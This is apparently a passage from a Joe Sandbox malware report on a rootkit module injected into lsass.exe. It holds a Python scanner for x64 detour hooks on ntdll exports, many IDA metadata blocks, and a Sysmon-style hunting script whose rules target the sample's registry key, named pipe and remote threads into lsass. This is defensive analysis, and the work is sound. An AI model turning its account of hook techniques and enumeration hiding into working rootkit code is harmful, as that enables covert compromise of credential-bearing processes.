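def classify_detour(addr: int, live: bytes) -> tuple:
    """Recognise the common x64 detour encodings at the start of a hooked stub."""
    if len(live) >= 5 and live[0] == 0xE9:                       # jmp rel32
        rel = struct.unpack_from("<i", live, 1)[0]
        return "jmp_rel32", (addr + 5 + rel) & 0xFFFFFFFFFFFFFFFF
    if len(live) >= 6 and live[:2] == b"\xff\x25":               # jmp qword ptr [rip+disp32]
        disp = struct.unpack_from("<i", live, 2)[0]
        if disp == 0 and len(live) >= 14:                        # pointer stored right after the jmp
            return "jmp_rip_indirect", struct.unpack_from("<Q", live, 6)[0]
        return "jmp_rip_indirect", None
    if len(live) >= 12 and live[:2] == b"\x48\xb8" and live[10:12] == b"\xff\xe0":
        return "mov_rax_jmp_rax", struct.unpack_from("<Q", live, 2)[0]   # mov rax,imm64 ; jmp rax
    if len(live) >= 6 and live[0] == 0x68 and live[5] == 0xC3:   # push imm32 ; ret
        return "push_ret", struct.unpack_from("<I", live, 1)[0]
    return "patched", None

def find_hooked_exports(clean, live, export_rva, base) -> list:
    """Report every target export whose in-memory bytes differ from the on-disk image."""
    reports = []
    for name in HOOK_TARGETS:
        if name not in clean or name not in live:
            continue
        n = min(len(clean[name]), len(live[name]))
        if clean[name][:n] == live[name][:n]:
            continue
        kind, target = classify_detour(base + export_rva[name], live[name])
        reports.append(HookReport(name, kind, target, clean_ssn(clean[name])))
    return reports

# ---- constructed fixture standing in for the disk image and the live process ----
NTDLL_BASE = 0x7FFB1A2C0000                                               # assumed load address
EXPORT_RVA = {n: 0x9D000 + 0x20 * i for i, n in enumerate(HOOK_TARGETS)}  # assumed RVAs
SSN = {n: 0x36 + i for i, n in enumerate(HOOK_TARGETS)}                   # assumed syscall numbers

def make_clean_stub(ssn: int) -> bytes:
    # mov r10,rcx ; mov eax,ssn ; test byte ptr [7FFE0308h],1 ; jne +3 ; syscall ; ret ; int 2Eh ; ret
    return CLEAN_PROLOGUE + struct.pack("<I", ssn) + bytes.fromhex("f604250803fe7f0175030f05c3cd2ec3")

def build_fixture():
    clean = {n: make_clean_stub(SSN[n]) for n in HOOK_TARGETS}
    live = dict(clean)
    # absolute jmp through an inline pointer, aimed at the module's 202c0ae2c10 routine
    live["NtQuerySystemInformation"] = (b"\xff\x25\x00\x00\x00\x00" + struct.pack("<Q", 0x202C0AE2C10)
                                        + clean["NtQuerySystemInformation"][14:])
    # mov rax,imm64 ; jmp rax, aimed at the module's 202c0ae104c routine
    live["NtQueryDirectoryFile"] = (b"\x48\xb8" + struct.pack("<Q", 0x202C0AE104C) + b"\xff\xe0"
                                    + clean["NtQueryDirectoryFile"][12:])
    # relative jmp to a code cave 0x1000 bytes further into ntdll itself
    src = NTDLL_BASE + EXPORT_RVA["NtResumeThread"]
    live["NtResumeThread"] = (b"\xe9" + struct.pack("<i", (src + 0x1000) - (src + 5))
                              + clean["NtResumeThread"][5:])
    return clean, live

def scan_fixture() -> list:
    clean, live = build_fixture()
    return find_hooked_exports(clean, live, EXPORT_RVA, NTDLL_BASE)

if __name__ == "__main__":
    for r in scan_fixture():
        print(f"{r.export:26} {r.kind:17} target={r.target:#x}  clean SSN={r.ssn:#x}")
```

On a real host `clean` comes from mapping ntdll.dll from System32 and walking its export directory, and `live` from ReadProcessMemory on the lsass.exe instance (SeDebugPrivilege required). The hook list in the string table does not include NtReadVirtualMemory, so a scanner running in a process this module has also been injected into still reads honest bytes; what it cannot trust is process, file, registry and service enumeration, which is why the export addresses should be taken from the on-disk PE rather than from an enumerated module list.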

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: baec013df6fc4971ffce898cd0bab83a3fc7025cc8603e9994d371d503a8ae48
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: 00512773205B84C6EB54CF62E48C39EB7A1F788F98F458226DB8907759DF39C0598B00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 72a15d6eb1e62704baa27dbf34ca553b203cd5cd033cc7637bf2fc98f3c886de
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 9C81AF31600B41C6FA60AB69A8CD3AD26D5AB45780F475527EB08477A7DB7DCA4E8700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: dc2b6e7dce2111566ed5963f35cc85bffcebf545e0d294b35b69bb20662b1d05
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 9E31A723608B81D6FB10DF22A88C35DA3A0F798BD5F464627DF8943B26DF38C5598740

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: d73814f5febecb032752754b0a7a611fbdcb6e6f59b240e9049195530b892124
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 5F317163618B81D6FB50DF66A88C76E63A0F784F85F06422BDF9A43726DF38C4198700

                                                        Control-flow Graph

                                                        (graph of the function at 202c0ae2c10-202c0ae2f99; the rendered graph is not reproduced here. Along its paths it calls GetModuleHandleA, GetProcAddress, StrCmpNIW and lstrlenW and the local routines 202c0ae1934, 202c0ae1bbc, 202c0ae1bf4, 202c0ae3c70 and 202c0ae89d0.)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: 1f7527f8dc7d92e78c3b64f47bf903be05fe56f062dfcd769cd478dd37487d5e
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 4EA18832200BD0C2FB688B25D48C6AD67A5F784B94F164027DF9953B9ADB35CCA9C380

                                                        Control-flow Graph

                                                        (graph of the function at 202c0ae104c-202c0ae11d2; the rendered graph is not reproduced here. It calls RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc and HeapFree in a value-enumeration loop.)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: 24bdfa1f3a3a6cbb920579a34c4224a1fa358229da05e14721e73508cdc3a0cc
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 8F414C33214BC0C6EB60CF62E48879E77A1F389B98F45821ADB8947B58DF39C559CB40

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 947e85be21f9d62775cb4baf97d7fb24950026edc3eb04451a6acccd281c1e17
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: 7E112632618B80C2F7108B21F48C75EA760F389BE4F514217EBAA06AA9CF3DC14DCB04
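Taken together, the named pipe in this function (\\.\pipe\Deadchildproc, used with CreateFile/ReadFile/WriteFile and GetCurrentProcess), the SOFTWARE\Deadconfig key with its paths/pid/process_names/service_names/startup/tcp_local/tcp_remote/udp values seen earlier in this dump, and the fact that the module lives inside lsass.exe give three host artifacts that can be hunted in endpoint telemetry. The block below is an added example for this page, not Joe Sandbox output and not the sample's code. It runs three rules over constructed Sysmon-style event records (field names as Sysmon logs them for EventID 8, 12, 13, 17 and 18) and then correlates hits by process. The registry hive (HKLM), the image paths and the ProcessGuid values are assumptions; the report only gives the key name relative to SOFTWARE.

```python
r"""Hunt the host artifacts this report exposes in Sysmon-style telemetry.

Added example (not the sample's code, not Joe Sandbox output).  Artifacts taken
from the report: the config key SOFTWARE\Deadconfig and its value names, the
pipe \\.\pipe\Deadchildproc, and the module's presence inside lsass.exe.
Assumed: the HKLM hive, the image paths and the ProcessGuid strings below."""
from collections import defaultdict
from dataclasses import dataclass

# Value names read from the config key (from the report's string table).
DEADCONFIG_VALUES = {"paths", "pid", "process_names", "service_names",
                     "startup", "tcp_local", "tcp_remote", "udp"}

@dataclass
class Alert:
    rule: str
    process_guid: str
    detail: str

def rule_config_write(ev):
    # Sysmon 12 (key create/delete) and 13 (value set) touching the config key
    if ev["EventID"] in (12, 13) and "\\SOFTWARE\\Deadconfig" in ev["TargetObject"]:
        obj = ev["TargetObject"]
        leaf = obj.rsplit("\\", 1)[-1]
        tag = "known config value" if leaf in DEADCONFIG_VALUES else "config key"
        return f"{tag} {obj}"
    return None

def rule_child_pipe(ev):
    # Sysmon 17 (pipe created) and 18 (pipe connected); PipeName omits \\.\pipe
    if ev["EventID"] in (17, 18) and ev["PipeName"].lower() == "\\deadchildproc":
        verb = "create" if ev["EventID"] == 17 else "connect"
        return f"pipe {ev['PipeName']} ({verb}) by {ev['Image']}"
    return None

def rule_lsass_remote_thread(ev):
    # Sysmon 8: CreateRemoteThread whose target is lsass.exe
    if ev["EventID"] == 8 and ev["TargetImage"].lower().endswith("\\lsass.exe"):
        return f"remote thread into {ev['TargetImage']} from {ev['SourceImage']}"
    return None

RULES = {"deadconfig_registry": rule_config_write,
         "deadchildproc_pipe": rule_child_pipe,
         "lsass_remote_thread": rule_lsass_remote_thread}

def evaluate(events):
    """Run every rule over every event; EventID 8 carries SourceProcessGuid, the rest ProcessGuid."""
    alerts = []
    for ev in events:
        guid = ev.get("ProcessGuid") or ev.get("SourceProcessGuid") or "?"
        for name, fn in RULES.items():
            detail = fn(ev)
            if detail:
                alerts.append(Alert(name, guid, detail))
    return alerts

def correlate(alerts):
    """Processes that trip two or more distinct rules; those are the ones to pull memory from."""
    by_proc = defaultdict(set)
    for a in alerts:
        by_proc[a.process_guid].add(a.rule)
    return {g: sorted(r) for g, r in by_proc.items() if len(r) >= 2}

# ---- constructed events (not from the report's network or host log) ----
DROPPER = "C:\\Users\\user\\Desktop\\mIURiU8n2P.exe"   # sample name from the report, path assumed
LSASS = "C:\\Windows\\System32\\lsass.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{guid-dropper}", "Image": DROPPER},
    {"EventID": 12, "ProcessGuid": "{guid-dropper}", "Image": DROPPER,
     "TargetObject": "HKLM\\SOFTWARE\\Deadconfig"},
    {"EventID": 13, "ProcessGuid": "{guid-dropper}", "Image": DROPPER,
     "TargetObject": "HKLM\\SOFTWARE\\Deadconfig\\process_names", "Details": "(constructed)"},
    {"EventID": 8, "SourceProcessGuid": "{guid-dropper}", "SourceImage": DROPPER,
     "TargetProcessGuid": "{guid-lsass}", "TargetImage": LSASS, "StartAddress": "0x202C0AE0000"},
    {"EventID": 17, "ProcessGuid": "{guid-lsass}", "Image": LSASS, "PipeName": "\\Deadchildproc"},
    {"EventID": 13, "ProcessGuid": "{guid-explorer}", "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "(benign, constructed)"},
]

if __name__ == "__main__":
    hits = evaluate(SAMPLE_EVENTS)
    for a in hits:
        print(f"{a.rule:22} {a.process_guid:16} {a.detail}")
    print("escalate:", correlate(hits))
```

Two caveats for running this against a real host rather than telemetry: NtEnumerateKey and NtEnumerateValueKey are in the module's hook list, so enumerating under SOFTWARE from a process the rootkit has reached may simply not show the Deadconfig key; open it by its full path (RegOpenKeyEx) or read the hive offline instead. Likewise the startup, process_names and service_names values describe what gets hidden from Run-key, process and service enumeration, so their contents are the hide list to search for by name, not something to expect in a listing.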

                                                        Control-flow Graph

                                                        (graph of the CRT startup routine at 202c0ae7930-202c0ae7c4c; the rendered graph is not reproduced here. It calls __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c and chains through the module's own initialisation helpers.)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: d432669762527435b42ef1848043dcdde929fd9ecb5280a77596072b64fe3a5c
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 318116226043C1C6FB54AB65A8CD35D2291AB85BC0F564127DBE987797DF39CB6E8300

                                                        Control-flow Graph (rendered as an image in the original report, blocks marked Executed / Not Executed): function at 202c0ae9930, basic blocks 202c0ae9930 to 202c0ae9a7d; blocks 202c0ae9980 to 202c0ae9a14 form a loop; LoadLibraryExW at 202c0ae99a2, on failure GetLastError at 202c0ae99c3, then a call to 202c0aeae48 (block 202c0ae99ce) and a second LoadLibraryExW at 202c0ae99e5; FreeLibrary at 202c0ae9a30 on the path from 202c0ae9a19; GetProcAddress at 202c0ae9a39 before the return at 202c0ae9a61.
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE99B5
                                                        • GetLastError.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE99C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE99ED
                                                        • FreeLibrary.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE9A33
                                                        • GetProcAddress.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE9A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: 5e283500570488e04c11cb878111f1f066800e919eaf2867852106ef62d998fd
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: E4318232312BD0D5FE259B42A88C79D6398BB48BA4F5B06279FBD07392DF38C4598344
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 7184855c9ba3123739d4c1803593c33873a5b36bf7853ab8baaa2b632e61460b
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 5C115B23214B40C6FB508B52E88C31D66A0F788FE4F054227EB5E87BA6CF7AC9088744
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction ID: 19b96c905ce15dbbc11c4f9e85588ff0474626fa4001dbc68910037396f6a183
                                                        • Opcode Fuzzy Hash: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction Fuzzy Hash: 06D19836208B88C6EA719B1AE49835E77A4F3C8B84F110617EBDD47BA6CF39C555CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 49f91a8f98d666937e78668de082471fcace1b9a6d33b7a4ae6b4ef7563b3861
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: A9319023709B91C2FB51DF56A48C3AD63A0FB64B80F4681279FD807B56EB38D4B98700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: c17ddeaabe1f8f50f5cc960665fa38cc4ef3ef8d2e66d3e5323e524351bba4bc
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: A3010522708B8086FB14DB12A89C75D62A1F788FC0F498537DF994375ADE39C98A8744
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
